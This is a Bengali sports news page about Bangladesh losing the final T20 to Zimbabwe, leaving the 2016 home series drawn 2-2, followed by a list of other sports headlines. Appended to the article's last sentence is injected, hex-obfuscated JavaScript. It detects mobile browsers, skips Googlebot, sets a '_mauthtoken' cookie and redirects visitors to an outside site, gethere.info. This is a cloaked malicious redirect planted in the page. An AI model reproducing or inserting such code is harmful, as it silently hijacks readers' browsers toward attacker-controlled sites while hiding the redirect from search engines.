for Add

সিরিজই হেরে গেলো বাংলাদেশ

bd-cricket5নিজস্ব প্রতিবেদক: ভারত, পাকিস্তান, দক্ষিণ আফ্রিকাকে হারিয়ে ২০১৫ সালটি সাফল্যে রাঙিয়েছিল বাংলাদেশ; কিন্তু ২০১৬ সালের প্রথম সিরিজেই আকাশে ওড়া দলটি একেবারে মাটিতে নেমে এল। জিম্বাবুয়ের সঙ্গে চতুর্থ ও শেষ টোয়েন্টি২০ ম্যাচে ১৮ রানে হেরেছে বাংলাদেশ। আর এ জয়ে সিরিজ ড্র করেছে জিম্বাবুয়ে।

বাংলাদেশে আসার আগে আফগানিস্তানের কাছে সিরিজ হেরে বিপর্যস্ত ছিল জিম্বাবুয়ে। টি-২০ ক্রিকেটে ১৪ নম্বরে থাকা দলটিকে ‘দুর্বলতার’ নিক্তিতে মেপেই যেন বাংলাদেশ চার ম্যাচের সিরিজটিকে এশিয়া কাপ ও বিশ্বকাপের প্রস্তুতি হিসেবে নিয়েছিল। টোয়েন্টি২০ ক্রিকেটে এমনিতে বাংলাদেশ দুর্বল দল, সে দুর্বলতা কাটাতে ব্যাপক পরীক্ষা-নিরীক্ষার পথেই হেঁটেছিল স্বাগতিকরা। আর ভেন্যু ছিল বাংলাদেশের দুর্গ খুলনা। যে মাঠে এ সিরিজের আগে হারের কোনো রেকর্ড নেই বাংলাদেশের।

প্রথম দুই ম্যাচে জিতে কক্ষপথেই ছিল বাংলাদেশ। কিন্তু দ্বিতীয় ম্যাচই যেন নানা বিপত্তি নিয়ে হাজির হয়েছিল। রান নিতে গিয়ে মুশফিক হ্যামেস্ট্রিং ইনজুরির কারণে সিরিজ থেকেই ছিটকে যান। বল করতে গিয়ে হাতে আঘাত পেয়ে ওভার শেষ করতে না পেরেই মাঠ ছাড়েন মুস্তাফিজ, পরের দুই ম্যাচে তাকে তাই দর্শক হয়েই থাকতে হয়েছে।

দলের এই দুই নির্ভরযোগ্য ক্রিকেটারের অনুপস্থিতি বাংলাদেশকে দুর্বল করবে এটা সহজেই অনুমেয়। সে সুযোগই কাজে লাগানোর স্বপ্ন দেখেছিলেন জিম্বাবুয়ে কোচ ডেভ হোয়াটমোর। তিনি রাখঢাক না রেখেই তৃতীয় ম্যাচের আগে বলে দিয়েছিলেন, জয়ের সুযোগ তৈরি হয়েছে।
কিন্তু তৃতীয় ম্যাচে বাংলাদেশ কোচ হাথুরুসিংহে যে একাদশ মাঠে নামান তা কেবল হোয়াটমোর না, ক্রিকেট বোঝেন এমন যে কাউকেই অবাক করার কথা। দলের সেরা ব্যাটসম্যান তামিম ইকবালকে রাখেন দলের বাইরে। চারজনকে অভিষেকের সুযোগ দেওয়ার পাশাপাশি দলে আনেন পাঁচ পরিবর্তন। ফল যা হওয়ার তাই হলো, দলকে জেতানোর মতো কাঁধ প্রসারিত করতে পারেননি কেউই। ২-১ ব্যবধানে পিছিয়ে থেকে জিম্বাবুয়ে সেই ম্যাচেই হুঙ্কার দিয়েছিল, সিরিজে সমতা নিয়েই দেশে ফিরবে তারা।

অন্যদিকে পরিবর্তনের তোড়ে বাংলাদেশের ক্রিকেটেই যেন ক্ষোভ-অসন্তোষ দেখা দেয়। খোদ বোর্ড প্রেসিডেন্ট নাজমুল হাসান পাপন তামিম, তাসকিন, আরাফাত সানিদের খেলাতে নির্দেশ দিয়েছিলেন কোচকে। চতুর্থ ম্যাচে তাদের প্রত্যেককেই মাঠে নামান হাথুরুসিংহে। কিন্তু ফল কিছুই হয়নি, জয়ের কক্ষপথে ফেরেনি বাংলাদেশ। খুলনার দর্শকদের সিরিজ ড্রয়ের সান্ত্বনা নিয়েই মাঠ ছাড়তে হয়েছে।

bd-cricketখুলনার শেখ আবু নাসের স্টেডিয়ামে শেষ টোয়েন্টি২০ ম্যাচটি শুরু হয় শুক্রবার বিকেল ৩টায়। টসে জিতে প্রথমে ব্যাট করতে নেমে সফরকারীরা শুরুটা ভালো করতে পারেনি। প্রথম ওভারের পঞ্চম বলেই জিম্বাবুয়ের ওপেনার সিবান্দাকে আউট করে সাজঘরে ফিরিয়েছিলেন বাংলাদেশ অধিনায়ক মাশরাফি। কিন্তু এরপর পুরো ম্যাচজুড়েই আধিপত্য ছিল জিম্বাবুয়ের। সাবলীল ব্যাটিং করা ওপেনার মাসাকাদজার বিরুদ্ধে যেন অকার্যকর ছিল বাংলাদেশের পুরো বোলিং লাইন। ৯৩ রানের অপরাজিত ইনিংস খেলে নির্ধারিত ২০ ওভারে দলকে ১৮০ রানের বড় সংগ্রহ এনে দেন তিনি।

প্রথম ওভারে সিবান্দা আউট হওয়ার পর মাসাকাদজা জুটি বাঁধেন মুতুম্বানির সাথে, বড় সংগ্রহের দিকে এগোনো এ জুটি ১১তম ওভারে ভাঙেন ক্যারিয়ারের দ্বিতীয় আন্তর্জাতিক ম্যাচ খেলা আবু হায়দার রনি। ১০.১ ওভারে জিম্বাবুয়ের ৮৪ রানে মুতুম্বানিকে বোল্ড আউট করেন তিনি। তবে মুতুম্বানি ৩২ রানে আউট হলেও মাসাকাদজা দায়িত্বশীল ব্যাটিং চালিয়ে যান। এবার তিনি জুটি বাঁধেন ওয়ালারের সাথে। ৩৬ রান করে ওয়ালার তাসকিনের শিকার হওয়ার পর সিকান্দার রাজাও আউট হন সাকিবের বলে। তবে ৫৮ বলে ৯৩ রানে অপরাজিত ছিলেন মাসাকাদজা। ৮ চার ও ৫ ছক্কায় ইনিংসটি সাজিয়েছেন তিনি। শেষ পর্যন্ত নির্ধারিত ২০ ওভারে ৪ উইকেট হারিয়ে ১৮০ রান সংগ্রহ করে জিম্বাবুয়ে।

২-১ ব্যবধানে এগিয়ে থাকা বাংলাদেশকে সিরিজ জয়ের লক্ষ্যে ১৮১ রান তাড়া করতে শুরুটা করেছিল আক্রমণাত্মক। কিন্তু ১ ওভারের বেশি তা স্থায়ী হয়নি। ১.২ ওভারে দলীয় ১২ রানে মাদজিবার বলে আউট হয়েছেন ওপেনার সৌম্য সরকার। আউট হওয়ার আগে ১ চার ও ১ ছক্কায় ৭ বলে তিনি ১১ রান করেছেন। এরপর টপ অর্ডার ব্যাটসম্যানরা কেবল আসা-যাওয়ার মিছিল করেছেন।

পরে একই ওভারের শেষ বলে আরেক ওপেনার তামিম ইকবাল বোল্ড হয়েছেন ১ রানে। পরের ওভারের প্রথম বলেই চিসিরোর বলে ১ রানে আউট হয়েছেন সাব্বির রহমান। ৩ বল পরেই ৪ রানে বোল্ড হয়েছেন সাকিব আল হাসান। তখন ২.৪ ওভারে ৪ উইকেট হারিয়ে স্বাগতিকদের সংগ্রহ ১৭ রান। ১৭ রানে ৪ উইকেট হারানো বাংলাদেশ ইমরুল কায়েস ও মাহমুদুল্লাহর জুটিতে ঘুরে দাঁড়ানোর চেষ্টা করলেও প্রতিরোধ স্থায়ী হয়নি। দলীয় ৫৩ রানে ইমরুল কায়েস ব্যক্তিগত ১৮ রানে সিকান্দার রাজার বলে আউট হন।

bd-cricket3৫৩ রানে ৫ উইকেট হারানো বাংলাদেশ আশা জাগিয়েছিল নবাগত নুরুল হাসান ও মাহমুদুল্লাহর ব্যাটে। কিন্তু ১৩.২ ওভারে ১৫ রানে সিকান্দার রাজার বলে নুরুল হাসান আউট হয়ে যান, দলের সংগ্রহ তখন ৬ উইকেটে ১১০ রান। তবে ইনিংসের শেষদিকে আবার মাশরাফির মারমুখী ব্যাটিংয়ে জয়ের ক্ষীণ আশা জেগে ওঠে। কিন্তু ১৫.৫ ওভারে ১৩৪ রানে মাহমুদুল্লাহ সপ্তম ব্যাটসম্যান হিসেবে আউট হয়ে গেলে পরাজয় অনেকটাই নিশ্চিত হয়ে যায় বাংলাদেশের। মাহমুদুল্লাহ চিসিরোর বলে বোল্ড হওয়ার আগে ৪১ বলে ৫৪ রান করেন। ৫ চার ও ২ ছক্কায় ইনিংসটি সাজিয়েছেন তিনি।

পরে ১৭.১ ওভারে দলীয় ১৩৮ রানে আউট হয়ে যান অধিনায়ক মাশরাফিও, জোঙ্গউই-এর বলে আউট হওয়ার আগে ১ চার ও ২ ছক্কায় ১২ বলে ২২ রান করেছেন তিনি। এছাড়া পেসার আবু হায়দার রনি ১০ বলে ১৪ ও স্পিনার আরাফাত সানি ৫ বলে ১০ রান করে আউট হয়েছেন। আর বাংলাদেশ ১৯ ওভারেই ১৬২ রান সংগ্রহ করে অলআউট হয়ে যায়। ফলে ১৮ রানের জয় পেয়ে সিরিজে ২-২ সমতা নিয়ে মাঠ ছেড়েছে জিম্বাবুয়ে। আর পুরো সিরিজেই অসাধারণ ব্যাটিং করা মাসাকাদজা ম্যাচ ও সিরিজ সেরা হয়েছেন।

এ সিরিজের পর ভিন্ন কারণে স্বস্তি পেতে পারে ক্রিকেটের নবীন সদস্য আফগানিস্তান। বিশ্ব র‌্যাঙ্কিংয়ের নবম দলটি এখন বলতেই পারে যে, যোগ্য দল হিসেবেই তারা বাংলাদেশের চেয়ে র‌্যাঙ্কিংয়ে এগিয়ে আছে। কারণ, এই জিম্বাবুয়েই যে নাকানিচুবানি খেয়ে এসেছে আফগানদের কাছে!var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add